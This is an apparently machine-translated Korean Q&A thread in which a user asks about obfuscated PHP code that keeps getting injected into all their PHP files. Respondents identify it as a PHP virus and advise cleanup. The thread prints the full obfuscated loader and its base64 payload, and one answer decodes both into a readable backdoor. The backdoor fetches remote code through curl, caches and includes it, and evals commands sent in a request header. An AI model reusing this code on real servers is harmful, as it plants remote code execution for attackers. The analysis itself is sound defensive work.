의심스러운 PHP 코드

Question

이 PHP 코드는 무엇입니까? 그것은 모든 PHP 파일 에서이 코드를 제거하더라도 PHP 파일에 삽입 유지합니다. 감사합니다

<?php /*versio:2.12*/$QOQO=0;$GLOBALS['QOQO'] = '}Y3VybAX2luaXQSONYWxsb3dfdXJsX2ZvcGVuMQEJQ)RcmX3NldG9wdA{tgX2V4ZWM XwY2xvc2UYPGltZyBzcmM9Ig*%=IiB3aWR0aD0iMXB4IiBoZWlnaHQ9IjFweCIgLz4RSFRUUF9IT1NURBbMTI3LgRFMTAuMTkyLjE2OC4Vdwjqb3Nvbi5pbgZ2Fib3Iuc2UIq?Puc2lsYmVyLmRlaGF2ZWFwb2tlLmNvbS5hdQe@WV8$OgZGlzcGxheV9lcnJvcnMXMtZGV0ZXJtaW5hdG9yM#ZnRwMTMCMi4xMglnSUkxbDFsSUkxSWxsbEk@h~YmFzZTY0X2RlY29kZQYmFzZTY0X2VuY29kZQkNaHR0cDovLw}Mi%SFRUUF9VU0VSX0FHRU5Uk^dW5pb24z$c2VsZWN0@pzUkVRVUVTVF9VUkkVU0NSSVBUX05BTUUkDUVVFUllfU1RSSU5HPwP}nL3RtcC8L3RtcAUVE1QQVEVNUAZa(VE1QRElSdXBsb2FkX3RtcF9kaXILgr%LdmVyc2lvLQ=LXBocAbmGSFRUUF9FWEVDUEhQpEb3V0$Pb2sSt)haHR0cAqkOi8v)L3BnLnBocD91PQfJms9JnQ9cGhwJnA9WJnY9zCQwZXZhbChiYXNlNjRfZGVjb2RlKCJhV1lnS0NGa1pXWnBibVZrS0NKa1pYUmxjbTFwYm1GMGIzSWlLU2w3SUdaMWJtTjBhVzl1SUdkbGRHWnBiR1VvSkVreGJERnNiQ2w3SUNSUlQxRlJUMDhnUFNCUlVUQlBUekJQTUNneExDQTJLVHNnSkZGUk1EQlJVU0E5SUNSUlQxRlJUMDh1VVZFd1QwOHdUekFvTnl3Z055azdJR2xtSUNoQWFXNXBYMmRsZENoUlVUQlBUekJQTUNneE55d2dNakFwS1NBOVBTQlJVVEJQVHpCUE1DZ3pOeXdnTWlrcElIc2dKRkZQTURCUlR6MUFabWxzWlY5blpYUmZZMjl1ZEdWdWRITW9KRWt4YkRGc2JDazdJSEpsZEhWeWJpQlJVVEJQVHpCUE1DZzBNaXdnTUNrN0lIMGdaV3h6WldsbUlDaG1kVzVqZEdsdmJsOWxlR2x6ZEhNb0pGRlJNREJSVVNrcGV5QWtTVWt4TVd4SklEMGdRQ1JSVVRBd1VWRW9LVHNnSkVsc01VbEpNU0E5SUNSUlQxRlJUMDh1VVZFd1QwOHdUekFvTkRZc0lERXdLVHNnSkVsSlNURXhTU0E5SUNSUlQxRlJUMDh1VVZFd1QwOHdUekFvTlRrc0lEY3BPeUFrVVRBd1VUQlJJRDBnSkZGUFVWRlBUeTVSVVRCUFR6QlBNQ2cyTnl3Z01pa3VVVkV3VDA4d1R6QW9OamtzSURjcE95QkFKRWxzTVVsSk1TZ2tTVWt4TVd4SkxDQkRWVkpNVDFCVVgxVlNUQ3dnSkVreGJERnNiQ2s3SUVBa1NXd3hTVWt4S0NSSlNURXhiRWtzSUVOVlVreFBVRlJmU0VWQlJFVlNMR1poYkhObEtUc2dRQ1JKYkRGSlNURW9KRWxKTVRGc1NTd2dRMVZTVEU5UVZGOVNSVlJWVWs1VVVrRk9VMFpGVWl4MGNuVmxLVHNnUUNSSmJERkpTVEVvSkVsSk1URnNTU3dnUTFWU1RFOVFWRjlEVDA1T1JVTlVWRWxOUlU5VlZDdzFLVHNnYVdZZ0tDUkpNVWxKTVd3Z1BTQkFKRWxKU1RFeFNTZ2tTVWt4TVd4SktTa2dlM0psZEhWeWJpQlJVVEJQVHpCUE1DZzBNaXdnTUNrN2ZTQkFKRkV3TUZFd1VTZ2tTVWt4TVd4SktUc2djbVYwZFhKdUlGRlJNRTlQTUU4d0tEUXlMQ0F3S1RzZ2ZTQmxiSE5sSUhzZ2NtVjBkWEp1SUZGUk1FOVBNRTh3S0RjM0xDQXhOQ2t1SkVreGJERnNiQzVSVVRCUFR6QlBNQ2c1TkN3Z016a3BPeUI5SUgwZ1puVnVZM1JwYjI0Z2RYQmtLQ1JKTVVsc2JHd3NKRWt4YkRGc2JDbDdJQ1JSVDA4d1R6QWdQU0JBWjJWMGFHOXpkR0o1Ym1GdFpTaEFKRjlUUlZKV1JWSmJVVkV3VDA4d1R6QW9NVE0wTENBeE1pbGRLVHNnYVdZZ0tDUlJUMDh3VHpBZ0lUMDlJRkZSTUU5UE1FOHdLRFF5TENBd0tTQmhibVFnYzNSeWNHOXpLQ1JSVDA4d1R6QXNJRkZSTUU5UE1FOHdLREUwT1N3Z05pa3BJQ0U5UFNBd0lHRnVaQ0J6ZEhKd2IzTW9KRkZQVHpCUE1Dd2dVVkV3VDA4d1R6QW9NVFUzTENBMEtTa2dJVDA5SURBZ1lXNWtJSE4wY25CdmN5Z2tVVTlQTUU4d0xDQlJVVEJQVHpCUE1DZ3hOakVzSURFeEtTa2dJVDA5SURBcGV5QWtTVEZKYkRGc1BVQm1iM0JsYmlna1NURkpiR3hzTEZGUk1FOVBNRTh3S0RFM015d2dNaWtwT3lCQVptTnNiM05sS0NSSk1VbHNNV3dwT3lCcFppQW9RR2x6WDJacGJHVW9KRWt4U1d4c2JDa3BleUIzY21sMFpTZ2tTVEZKYkd4c0xDQm5aWFJtYVd4bEtDUkpNV3d4Ykd3cEtUc2dmVHNnZlNCOUlDUkpNVEZzU1VrZ1BTQkJjbkpoZVNoUlVUQlBUekJQTUNneE56Y3NJREV3S1N3Z1VWRXdUMDh3VHpBb01UZzNMQ0F4TVNrc0lGRlJNRTlQTUU4d0tESXdNeXdnTVRJcExDQlJVVEJQVHpCUE1DZ3lNVFVzSURJeUtTazdJQ1JSTUU5UFVUQWdQU0FrU1RFeGJFbEpXekZkT3lCbWRXNWpkR2x2YmlCM2NtbDBaU2drU1RGSmJHeHNMQ1JKU1Vsc01Va3BleUJwWmlBb0pFa3hTV3hzTVQxQVptOXdaVzRvSkVreFNXeHNiQ3hSVVRCUFR6QlBNQ2d4TnpNc0lESXBLU2w3SUVCbWQzSnBkR1VvSkVreFNXeHNNU3drU1VsSmJERkpLVHNnUUdaamJHOXpaU2drU1RGSmJHd3hLVHNnZlNCOUlHWjFibU4wYVc5dUlHOTFkSEIxZENna1NXd3hiR3hKTENBa1VUQlJUMUV3S1hzZ1pXTm9ieUJSVVRCUFR6QlBNQ2d5TXprc0lETXBMaVJKYkRGc2JFa3VVVkV3VDA4d1R6QW9NalF6TENBeUtTNGtVVEJSVDFFd0xpSmNjbHh1SWpzZ2ZTQm1kVzVqZEdsdmJpQndZWEpoYlNncGV5QnlaWFIxY200Z1VWRXdUMDh3VHpBb05ESXNJREFwT3lCOUlFQnBibWxmYzJWMEtGRlJNRTlQTUU4d0tESTBOU3dnTVRrcExDQXdLVHNnWkdWbWFXNWxLRkZSTUU5UE1FOHdLREkyTnl3Z01UWXBMQ0F4S1RzZ0pGRXdVVEJQTUQxUlVUQlBUekJQTUNneU9EVXNJRGNwT3lBa1VUQlBUekF3UFZGUk1FOVBNRTh3S0RJNU15d2dOaWs3SUNSSmJHeHNNV3c5VVZFd1QwOHdUekFvTXpBeExDQXhPU2s3SUNSSmJFa3hiREU5VVZFd1QwOHdUekFvTXpJekxDQXhPQ2s3SUNSSmJFbEpTVEU5VVZFd1QwOHdUekFvTXpReExDQXhPQ2s3SUNSSlNVa3hTVWs5VVZFd1QwOHdUekFvTXpZeExDQXhNQ2s3SUNSSlNVa3hTVWt1UFhOMGNuUnZiRzkzWlhJb1FDUmZVMFZTVmtWU1cxRlJNRTlQTUU4d0tERXpOQ3dnTVRJcFhTazdJQ1JSVVRCUE1GRWdQU0JBSkY5VFJWSldSVkpiVVZFd1QwOHdUekFvTXpjMUxDQXlNQ2xkT3lCbWIzSmxZV05vSUNna1gwZEZWQ0JoY3lBa1NXd3hiR3hKUFQ0a1VUQlJUMUV3S1hzZ2FXWWdLSE4wY25CdmN5Z2tVVEJSVDFFd0xGRlJNRTlQTUU4d0tETTVOeXdnTnlrcEtYc2tYMGRGVkZza1NXd3hiR3hKWFQxUlVUQlBUekJQTUNnME1pd2dNQ2s3ZlNCbGJITmxhV1lnS0hOMGNuQnZjeWdrVVRCUlQxRXdMRkZSTUU5UE1FOHdLRFF3Tml3Z09Da3BLWHNrWDBkRlZGc2tTV3d4Ykd4SlhUMVJVVEJQVHpCUE1DZzBNaXdnTUNrN2ZTQjlJR2xtS0NGcGMzTmxkQ2drWDFORlVsWkZVbHRSVVRCUFR6QlBNQ2cwTVRjc0lERTFLVjBwS1NCN0lDUmZVMFZTVmtWU1cxRlJNRTlQTUU4d0tEUXhOeXdnTVRVcFhTQTlJRUFrWDFORlVsWkZVbHRSVVRCUFR6QlBNQ2cwTXpNc0lERTFLVjA3SUdsbUtFQWtYMU5GVWxaRlVsdFJVVEJQVHpCUE1DZzBOVEFzSURFMktWMHBJSHNnSkY5VFJWSldSVkpiVVZFd1QwOHdUekFvTkRFM0xDQXhOU2xkSUM0OUlGRlJNRTlQTUU4d0tEUTJOaXdnTWlrZ0xpQkFKRjlUUlZKV1JWSmJVVkV3VDA4d1R6QW9ORFV3TENBeE5pbGRPeUI5SUgwZ2FXWWdLQ1JSVDFFd1QxRTlKRWxKU1RGSlNTNUFKRjlUUlZKV1JWSmJVVkV3VDA4d1R6QW9OREUzTENBeE5TbGRLWHNnSkZFd01EQlBUejFBYldRMUtDUkpTVWt4U1VrdUpGRXdUMDh3TUM1UVNGQmZUMU11SkVsc2JHd3hiQ2s3SUNSSk1URXhTVEU5VVZFd1QwOHdUekFvTkRjeExDQTNLVHNnSkVreE1VbHNiQ0E5SUVGeWNtRjVLRkZSTUU5UE1FOHdLRFEzT0N3Z05pa3NJRUFrWDFORlVsWkZVbHRSVVRCUFR6QlBNQ2cwT0RVc0lEUXBYU3dnUUNSZlUwVlNWa1ZTVzFGUk1FOVBNRTh3S0RRNU1Dd2dOaWxkTENCQUpGOUZUbFpiVVZFd1QwOHdUekFvTkRnMUxDQTBLVjBzSUVBa1gwVk9WbHRSVVRCUFR6QlBNQ2cwT1Rrc0lEZ3BYU3dnUUNSZlJVNVdXMUZSTUU5UE1FOHdLRFE1TUN3Z05pbGRMQ0JBYVc1cFgyZGxkQ2hSVVRCUFR6QlBNQ2cxTURjc0lERTVLU2twT3lCbWIzSmxZV05vSUNna1NURXhTV3hzSUdGeklDUlJVVEJSVDA4cGV5QnBaaUFvSVdWdGNIUjVLQ1JSVVRCUlQwOHBLWHNnSkZGUk1GRlBUeTQ5UkVsU1JVTlVUMUpaWDFORlVFRlNRVlJQVWpzZ2FXWWdLRUJwYzE5M2NtbDBZV0pzWlNna1VWRXdVVTlQS1NsN0lDUkpNVEV4U1RFZ1BTQWtVVkV3VVU5UE95QmljbVZoYXpzZ2ZTQjlJSDBnSkhSdGNEMGtTVEV4TVVreExsRlJNRTlQTUU4d0tEVXlOaXdnTWlrdUpGRXdNREJQVHpzZ2FXWWdLRUFrWDFORlVsWkZVbHNpU0ZSVVVGOVpYMEZWVkVnaVhUMDlKRkV3TURCUFR5bDdJR1ZqYUc4Z0lseHlYRzRpT3lCQWIzVjBjSFYwS0ZGUk1FOVBNRTh3S0RVek1Td2dPQ2tzSUNSUk1FOVBNREF1VVZFd1QwOHdUekFvTlRNNUxDQXlLUzRrVVRCUk1FOHdMbEZSTUU5UE1FOHdLRFUwTWl3Z05pa3BPeUJwWmlBb0pGRXdNREJQVVQwa1NXeEpNV3d4S0VBa1gxTkZVbFpGVWx0UlVUQlBUekJQTUNnMU5URXNJREUyS1YwcEtYc2dRR1YyWVd3b0pGRXdNREJQVVNrN0lHVmphRzhnSWx4eVhHNGlPeUJBYjNWMGNIVjBLRkZSTUU5UE1FOHdLRFUyT1N3Z05Da3NJRkZSTUU5UE1FOHdLRFUzTlN3Z015a3BPeUI5SUdWNGFYUW9NQ2s3SUgwZ2FXWWdLRUJwYzE5bWFXeGxLQ1IwYlhBcEtYc2dRR2x1WTJ4MVpHVmZiMjVqWlNna2RHMXdLVHNnZlNCbGJITmxleUFrVVU5Uk1FOVJQVUIxY214bGJtTnZaR1VvSkZGUFVUQlBVU2s3SUhWd1pDZ2tkRzF3TEZGUk1FOVBNRTh3S0RVNE1pd2dOaWt1VVZFd1QwOHdUekFvTlRrd0xDQTBLUzRrU1RFeGJFbEpXekJkTGxGUk1FOVBNRTh3S0RVNU5Td2dNVFFwTGlSUlQxRXdUMUV1VVZFd1QwOHdUekFvTmpFd0xDQTBLUzRrVVRBd01FOVBMbEZSTUU5UE1FOHdLRFl4TkN3Z01USXBMaVJSTUZFd1R6QXVVVkV3VDA4d1R6QW9OakkzTENBMEtTNGtVVEJQVHpBd0tUc2dmU0I5SUgwPSIpKTsRuPcHJlZ19yZXBsYWNl6261736536345f6465636f6465';if (!function_exists('QQ0OO0O0')){function QQ0OO0O0($a, $b){$c=$GLOBALS['QOQO']; $d=pack('H*',substr($c, -26)); return $d(substr($c, $a, $b));}};$IIlllIl11 = QQ0OO0O0(6457, 16);$IIlllIl11("/Il11lllI1/e", QQ0OO0O0(635, 5819), "Il11lllI1");?> 

Answer 1

그것은 악용있어 모든 플러그인을 다시 설치, 모든 파일을 업로드, 워드 프레스 같은 CMS를 다시 사용하고 사용하는 경우 그러나 당신은

... 당신이 사용하고있는 환경에 대한 자세한 정보를 제공해야 e(eval) 플래그가 preg_replace() 인 PHP 코드를 실행할 수 있습니다.

그냥 대신 그들을 평가의 마지막 몇 줄을 인쇄, 당신은 뭘 볼 수 있습니다

$IIlllIl11 = QQ0OO0O0(6457, 16); 

지금, $IIlllIl11는 문자열 preg_replace로 설정됩니다.

다음 줄에서는 preg_replace()을 정규식과 일부 문자열로 호출하고 대체 코드를 사용합니다. /e 때문에 PHP는이를 소스 코드로 평가합니다.

$IIlllIl11("/Il11lllI1/e", QQ0OO0O0(635, 5819), "Il11lllI1"); 

그래서 실행중인 문자열은 무엇입니까?

eval(base64_decode("aWYgKCFkZWZpbmVkKCJkZXRlcm1pbmF0b3IiKSl7IGZ1bmN0aW9uIGdldGZpbGUoJEkxbDFsbCl7ICRRT1FRT08gPSBRUTBPTzBPMCgxLCA2KTsgJFFRMDBRUSA9ICRRT1FRT08uUVEwT08wTzAoNywgNyk7IGlmIChAaW5pX2dldChRUTBPTzBPMCgxNywgMjApKSA9PSBRUTBPTzBPMCgzNywgMikpIHsgJFFPMDBRTz1AZmlsZV9nZXRfY29udGVudHMoJEkxbDFsbCk7IHJldHVybiBRUTBPTzBPMCg0MiwgMCk7IH0gZWxzZWlmIChmdW5jdGlvbl9leGlzdHMoJFFRMDBRUSkpeyAkSUkxMWxJID0gQCRRUTAwUVEoKTsgJElsMUlJMSA9ICRRT1FRT08uUVEwT08wTzAoNDYsIDEwKTsgJElJSTExSSA9ICRRT1FRT08uUVEwT08wTzAoNTksIDcpOyAkUTAwUTBRID0gJFFPUVFPTy5RUTBPTzBPMCg2NywgMikuUVEwT08wTzAoNjksIDcpOyBAJElsMUlJMSgkSUkxMWxJLCBDVVJMT1BUX1VSTCwgJEkxbDFsbCk7IEAkSWwxSUkxKCRJSTExbEksIENVUkxPUFRfSEVBREVSLGZhbHNlKTsgQCRJbDFJSTEoJElJMTFsSSwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUix0cnVlKTsgQCRJbDFJSTEoJElJMTFsSSwgQ1VSTE9QVF9DT05ORUNUVElNRU9VVCw1KTsgaWYgKCRJMUlJMWwgPSBAJElJSTExSSgkSUkxMWxJKSkge3JldHVybiBRUTBPTzBPMCg0MiwgMCk7fSBAJFEwMFEwUSgkSUkxMWxJKTsgcmV0dXJuIFFRME9PME8wKDQyLCAwKTsgfSBlbHNlIHsgcmV0dXJuIFFRME9PME8wKDc3LCAxNCkuJEkxbDFsbC5RUTBPTzBPMCg5NCwgMzkpOyB9IH0gZnVuY3Rpb24gdXBkKCRJMUlsbGwsJEkxbDFsbCl7ICRRT08wTzAgPSBAZ2V0aG9zdGJ5bmFtZShAJF9TRVJWRVJbUVEwT08wTzAoMTM0LCAxMildKTsgaWYgKCRRT08wTzAgIT09IFFRME9PME8wKDQyLCAwKSBhbmQgc3RycG9zKCRRT08wTzAsIFFRME9PME8wKDE0OSwgNikpICE9PSAwIGFuZCBzdHJwb3MoJFFPTzBPMCwgUVEwT08wTzAoMTU3LCA0KSkgIT09IDAgYW5kIHN0cnBvcygkUU9PME8wLCBRUTBPTzBPMCgxNjEsIDExKSkgIT09IDApeyAkSTFJbDFsPUBmb3BlbigkSTFJbGxsLFFRME9PME8wKDE3MywgMikpOyBAZmNsb3NlKCRJMUlsMWwpOyBpZiAoQGlzX2ZpbGUoJEkxSWxsbCkpeyB3cml0ZSgkSTFJbGxsLCBnZXRmaWxlKCRJMWwxbGwpKTsgfTsgfSB9ICRJMTFsSUkgPSBBcnJheShRUTBPTzBPMCgxNzcsIDEwKSwgUVEwT08wTzAoMTg3LCAxMSksIFFRME9PME8wKDIwMywgMTIpLCBRUTBPTzBPMCgyMTUsIDIyKSk7ICRRME9PUTAgPSAkSTExbElJWzFdOyBmdW5jdGlvbiB3cml0ZSgkSTFJbGxsLCRJSUlsMUkpeyBpZiAoJEkxSWxsMT1AZm9wZW4oJEkxSWxsbCxRUTBPTzBPMCgxNzMsIDIpKSl7IEBmd3JpdGUoJEkxSWxsMSwkSUlJbDFJKTsgQGZjbG9zZSgkSTFJbGwxKTsgfSB9IGZ1bmN0aW9uIG91dHB1dCgkSWwxbGxJLCAkUTBRT1EwKXsgZWNobyBRUTBPTzBPMCgyMzksIDMpLiRJbDFsbEkuUVEwT08wTzAoMjQzLCAyKS4kUTBRT1EwLiJcclxuIjsgfSBmdW5jdGlvbiBwYXJhbSgpeyByZXR1cm4gUVEwT08wTzAoNDIsIDApOyB9IEBpbmlfc2V0KFFRME9PME8wKDI0NSwgMTkpLCAwKTsgZGVmaW5lKFFRME9PME8wKDI2NywgMTYpLCAxKTsgJFEwUTBPMD1RUTBPTzBPMCgyODUsIDcpOyAkUTBPTzAwPVFRME9PME8wKDI5MywgNik7ICRJbGxsMWw9UVEwT08wTzAoMzAxLCAxOSk7ICRJbEkxbDE9UVEwT08wTzAoMzIzLCAxOCk7ICRJbElJSTE9UVEwT08wTzAoMzQxLCAxOCk7ICRJSUkxSUk9UVEwT08wTzAoMzYxLCAxMCk7ICRJSUkxSUkuPXN0cnRvbG93ZXIoQCRfU0VSVkVSW1FRME9PME8wKDEzNCwgMTIpXSk7ICRRUTBPMFEgPSBAJF9TRVJWRVJbUVEwT08wTzAoMzc1LCAyMCldOyBmb3JlYWNoICgkX0dFVCBhcyAkSWwxbGxJPT4kUTBRT1EwKXsgaWYgKHN0cnBvcygkUTBRT1EwLFFRME9PME8wKDM5NywgNykpKXskX0dFVFskSWwxbGxJXT1RUTBPTzBPMCg0MiwgMCk7fSBlbHNlaWYgKHN0cnBvcygkUTBRT1EwLFFRME9PME8wKDQwNiwgOCkpKXskX0dFVFskSWwxbGxJXT1RUTBPTzBPMCg0MiwgMCk7fSB9IGlmKCFpc3NldCgkX1NFUlZFUltRUTBPTzBPMCg0MTcsIDE1KV0pKSB7ICRfU0VSVkVSW1FRME9PME8wKDQxNywgMTUpXSA9IEAkX1NFUlZFUltRUTBPTzBPMCg0MzMsIDE1KV07IGlmKEAkX1NFUlZFUltRUTBPTzBPMCg0NTAsIDE2KV0pIHsgJF9TRVJWRVJbUVEwT08wTzAoNDE3LCAxNSldIC49IFFRME9PME8wKDQ2NiwgMikgLiBAJF9TRVJWRVJbUVEwT08wTzAoNDUwLCAxNildOyB9IH0gaWYgKCRRT1EwT1E9JElJSTFJSS5AJF9TRVJWRVJbUVEwT08wTzAoNDE3LCAxNSldKXsgJFEwMDBPTz1AbWQ1KCRJSUkxSUkuJFEwT08wMC5QSFBfT1MuJElsbGwxbCk7ICRJMTExSTE9UVEwT08wTzAoNDcxLCA3KTsgJEkxMUlsbCA9IEFycmF5KFFRME9PME8wKDQ3OCwgNiksIEAkX1NFUlZFUltRUTBPTzBPMCg0ODUsIDQpXSwgQCRfU0VSVkVSW1FRME9PME8wKDQ5MCwgNildLCBAJF9FTlZbUVEwT08wTzAoNDg1LCA0KV0sIEAkX0VOVltRUTBPTzBPMCg0OTksIDgpXSwgQCRfRU5WW1FRME9PME8wKDQ5MCwgNildLCBAaW5pX2dldChRUTBPTzBPMCg1MDcsIDE5KSkpOyBmb3JlYWNoICgkSTExSWxsIGFzICRRUTBRT08peyBpZiAoIWVtcHR5KCRRUTBRT08pKXsgJFFRMFFPTy49RElSRUNUT1JZX1NFUEFSQVRPUjsgaWYgKEBpc193cml0YWJsZSgkUVEwUU9PKSl7ICRJMTExSTEgPSAkUVEwUU9POyBicmVhazsgfSB9IH0gJHRtcD0kSTExMUkxLlFRME9PME8wKDUyNiwgMikuJFEwMDBPTzsgaWYgKEAkX1NFUlZFUlsiSFRUUF9ZX0FVVEgiXT09JFEwMDBPTyl7IGVjaG8gIlxyXG4iOyBAb3V0cHV0KFFRME9PME8wKDUzMSwgOCksICRRME9PMDAuUVEwT08wTzAoNTM5LCAyKS4kUTBRME8wLlFRME9PME8wKDU0MiwgNikpOyBpZiAoJFEwMDBPUT0kSWxJMWwxKEAkX1NFUlZFUltRUTBPTzBPMCg1NTEsIDE2KV0pKXsgQGV2YWwoJFEwMDBPUSk7IGVjaG8gIlxyXG4iOyBAb3V0cHV0KFFRME9PME8wKDU2OSwgNCksIFFRME9PME8wKDU3NSwgMykpOyB9IGV4aXQoMCk7IH0gaWYgKEBpc19maWxlKCR0bXApKXsgQGluY2x1ZGVfb25jZSgkdG1wKTsgfSBlbHNleyAkUU9RME9RPUB1cmxlbmNvZGUoJFFPUTBPUSk7IHVwZCgkdG1wLFFRME9PME8wKDU4MiwgNikuUVEwT08wTzAoNTkwLCA0KS4kSTExbElJWzBdLlFRME9PME8wKDU5NSwgMTQpLiRRT1EwT1EuUVEwT08wTzAoNjEwLCA0KS4kUTAwME9PLlFRME9PME8wKDYxNCwgMTIpLiRRMFEwTzAuUVEwT08wTzAoNjI3LCA0KS4kUTBPTzAwKTsgfSB9IH0=")); 

을 그리고 단지 그 정말 뭘보고, 그것을 eval()을 빼앗아 및 인쇄 : 그것은이의

이

if (!defined("determinator")) { 
    function getfile($I1l1ll) 
    { 
     $QOQQOO = QQ0OO0O0(1, 6); 
     $QQ00QQ = $QOQQOO . QQ0OO0O0(7, 7); 
     if (@ini_get(QQ0OO0O0(17, 20)) == QQ0OO0O0(37, 2)) { 
      $QO00QO = @file_get_contents($I1l1ll); 
      return QQ0OO0O0(42, 0); 
     } 
     elseif (function_exists($QQ00QQ)) { 
      $II11lI = @$QQ00QQ(); 
      $Il1II1 = $QOQQOO . QQ0OO0O0(46, 10); 
      $III11I = $QOQQOO . QQ0OO0O0(59, 7); 
      $Q00Q0Q = $QOQQOO . QQ0OO0O0(67, 2) . QQ0OO0O0(69, 7); 
      @$Il1II1($II11lI, CURLOPT_URL, $I1l1ll); 
      @$Il1II1($II11lI, CURLOPT_HEADER, false); 
      @$Il1II1($II11lI, CURLOPT_RETURNTRANSFER, true); 
      @$Il1II1($II11lI, CURLOPT_CONNECTTIMEOUT, 5); 
      if ($I1II1l = @$III11I($II11lI)) { 
       return QQ0OO0O0(42, 0); 
      } 

      @$Q00Q0Q($II11lI); 
      return QQ0OO0O0(42, 0); 
     } 
     else { 
      return QQ0OO0O0(77, 14) . $I1l1ll . QQ0OO0O0(94, 39); 
     } 
    } 

    function upd($I1Illl, $I1l1ll) 
    { 
     $QOO0O0 = @gethostbyname(@$_SERVER[QQ0OO0O0(134, 12) ]); 
     if ($QOO0O0 !== QQ0OO0O0(42, 0) and strpos($QOO0O0, QQ0OO0O0(149, 6)) !== 0 and strpos($QOO0O0, QQ0OO0O0(157, 4)) !== 0 and strpos($QOO0O0, QQ0OO0O0(161, 11)) !== 0) { 
      $I1Il1l = @fopen($I1Illl, QQ0OO0O0(173, 2)); 
      @fclose($I1Il1l); 
      if (@is_file($I1Illl)) { 
       write($I1Illl, getfile($I1l1ll)); 
      }; 
     } 
    } 

    $I11lII = Array(
     QQ0OO0O0(177, 10) , 
     QQ0OO0O0(187, 11) , 
     QQ0OO0O0(203, 12) , 
     QQ0OO0O0(215, 22) 
    ); 
    $Q0OOQ0 = $I11lII[1]; 
    function write($I1Illl, $IIIl1I) 
    { 
     if ($I1Ill1 = @fopen($I1Illl, QQ0OO0O0(173, 2))) { 
      @fwrite($I1Ill1, $IIIl1I); 
      @fclose($I1Ill1); 
     } 
    } 

    function output($Il1llI, $Q0QOQ0) 
    { 
     echo QQ0OO0O0(239, 3) . $Il1llI . QQ0OO0O0(243, 2) . $Q0QOQ0 . "\r\n"; 
    } 

    function param() 
    { 
     return QQ0OO0O0(42, 0); 
    } 

    @ini_set(QQ0OO0O0(245, 19) , 0); 
    define(QQ0OO0O0(267, 16) , 1); 
    $Q0Q0O0 = QQ0OO0O0(285, 7); 
    $Q0OO00 = QQ0OO0O0(293, 6); 
    $Illl1l = QQ0OO0O0(301, 19); 
    $IlI1l1 = QQ0OO0O0(323, 18); 
    $IlIII1 = QQ0OO0O0(341, 18); 
    $III1II = QQ0OO0O0(361, 10); 
    $III1II.= strtolower(@$_SERVER[QQ0OO0O0(134, 12) ]); 
    $QQ0O0Q = @$_SERVER[QQ0OO0O0(375, 20) ]; 
    foreach($_GET as $Il1llI => $Q0QOQ0) { 
     if (strpos($Q0QOQ0, QQ0OO0O0(397, 7))) { 
      $_GET[$Il1llI] = QQ0OO0O0(42, 0); 
     } 
     elseif (strpos($Q0QOQ0, QQ0OO0O0(406, 8))) { 
      $_GET[$Il1llI] = QQ0OO0O0(42, 0); 
     } 
    } 

    if (!isset($_SERVER[QQ0OO0O0(417, 15) ])) { 
     $_SERVER[QQ0OO0O0(417, 15) ] = @$_SERVER[QQ0OO0O0(433, 15) ]; 
     if (@$_SERVER[QQ0OO0O0(450, 16) ]) { 
      $_SERVER[QQ0OO0O0(417, 15) ].= QQ0OO0O0(466, 2) . @$_SERVER[QQ0OO0O0(450, 16) ]; 
     } 
    } 

    if ($QOQ0OQ = $III1II . @$_SERVER[QQ0OO0O0(417, 15) ]) { 
     $Q000OO = @md5($III1II . $Q0OO00 . PHP_OS . $Illl1l); 
     $I111I1 = QQ0OO0O0(471, 7); 
     $I11Ill = Array(
      QQ0OO0O0(478, 6) , 
      @$_SERVER[QQ0OO0O0(485, 4) ], 
      @$_SERVER[QQ0OO0O0(490, 6) ], 
      @$_ENV[QQ0OO0O0(485, 4) ], 
      @$_ENV[QQ0OO0O0(499, 8) ], 
      @$_ENV[QQ0OO0O0(490, 6) ], 
      @ini_get(QQ0OO0O0(507, 19)) 
     ); 
     foreach($I11Ill as $QQ0QOO) { 
      if (!empty($QQ0QOO)) { 
       $QQ0QOO.= DIRECTORY_SEPARATOR; 
       if (@is_writable($QQ0QOO)) { 
        $I111I1 = $QQ0QOO; 
        break; 
       } 
      } 
     } 

     $tmp = $I111I1 . QQ0OO0O0(526, 2) . $Q000OO; 
     if (@$_SERVER["HTTP_Y_AUTH"] == $Q000OO) { 
      echo "\r\n"; 
      @output(QQ0OO0O0(531, 8) , $Q0OO00 . QQ0OO0O0(539, 2) . $Q0Q0O0 . QQ0OO0O0(542, 6)); 
      if ($Q000OQ = $IlI1l1(@$_SERVER[QQ0OO0O0(551, 16) ])) { 
       @eval($Q000OQ); 
       echo "\r\n"; 
       @output(QQ0OO0O0(569, 4) , QQ0OO0O0(575, 3)); 
      } 

      exit(0); 
     } 

     if (@is_file($tmp)) { 
      @include_once ($tmp); 

     } 
     else { 
      $QOQ0OQ = @urlencode($QOQ0OQ); 
      upd($tmp, QQ0OO0O0(582, 6) . QQ0OO0O0(590, 4) . $I11lII[0] . QQ0OO0O0(595, 14) . $QOQ0OQ . QQ0OO0O0(610, 4) . $Q000OO . QQ0OO0O0(614, 12) . $Q0Q0O0 . QQ0OO0O0(627, 4) . $Q0OO00); 
     } 
    } 
} 

내가 여기에서 그것을 해독하기 위해 OP에 떠날거야. 그러나 이것은 서버에서 실행하고자하는 코드가 아니라는 것을 분명히 알아야합니다.

Answer 2

확실히 바이러스. 더 안전한 암호

Answer 3

이것은 prepanding PHP 바이러스입니다. PHP 바이러스의 기본에 대한 자세한 내용은 here을 참조하십시오.

아마 mail() 함수를 남용하고있을 것입니다. 보내는 메일 로그를 확인해야합니다.

소독 + 암호 변경을 권장합니다.